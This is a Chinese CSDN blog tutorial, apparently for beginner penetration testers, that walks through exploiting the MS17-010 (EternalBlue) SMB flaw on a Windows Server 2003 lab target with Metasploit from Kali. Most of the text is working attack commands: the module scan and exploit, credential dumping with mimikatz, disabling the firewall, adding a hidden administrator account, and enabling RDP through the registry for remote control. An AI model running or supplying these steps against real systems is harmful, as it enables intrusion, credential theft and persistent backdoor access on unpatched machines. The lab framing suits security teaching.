永恒之蓝——Windows server 2003 漏洞复现

本文详细介绍了如何在Kali Linux上使用Metasploit框架发现并利用Windows Server 2003的MS17_010 SMB漏洞,包括扫描、利用步骤,以及后续的靶机操控和安全测试,适合渗透测试初学者学习。
摘要由CSDN通过智能技术生成

复现漏洞

靶机:Windows server 2003 IP:192.168.64.129

攻击机:kali 2021

1.在kali中启动msf模块

在控制台输入:msfconsole,或者在文件的漏洞利用工具集中双击metasploit framework进入msf。

 进入后页面如下,图像为随机图像,如若与上图不符合实属正常现象。

2.搜索ms17_010:search ms17_010

 3.使用命令:use auxiliary/scanner/smb/smb_ms17_010

 4.show options 输入options来获得帮助命令。

RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描。

 5.set rhosts 192.168.64.129 扫描靶机(windows 2003 )并输入run或者exploit攻击。

 出现上述的情况表明存在漏洞,即445端口开放。

漏洞利用

1.启动windows2003攻击模块

输入命令:use exploit/windows/smb/ms17_010_psexec

 2.输入run或者exploit开始攻击

 攻击成功后出现如上页面。接下来可以使用kali操控靶机。

kali操作靶机

1.获取屏幕截图

直接输入screenshot即可获得屏幕截图。

 2.获取密码

输入load mimikatz,然后再输入wdigest。即可获得

3.shell控制

  • 首先关闭靶机防火墙

        netsh firewall set opmode mode=disable

         查看防护墙状态:netsh firewall show state

  •  添加用户:net user hack 123 /add

         查看靶机用户:net user

  •  给已添加的用户做提权处理:net localgroup Administrators hack /add

         可以输入net user确认是否提升为管理员权限。

  • 查看端口靶机端口开放情况。netstat -ano

        如果3389端口没有开放,可以输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\         Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开启。

        查看3389端口:netstat -aon | findstr "3389"

  • 远程操控靶机:在控制面板输入rdesktop ip即可,我的主机即输入rdesktop 192.168.64.129

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值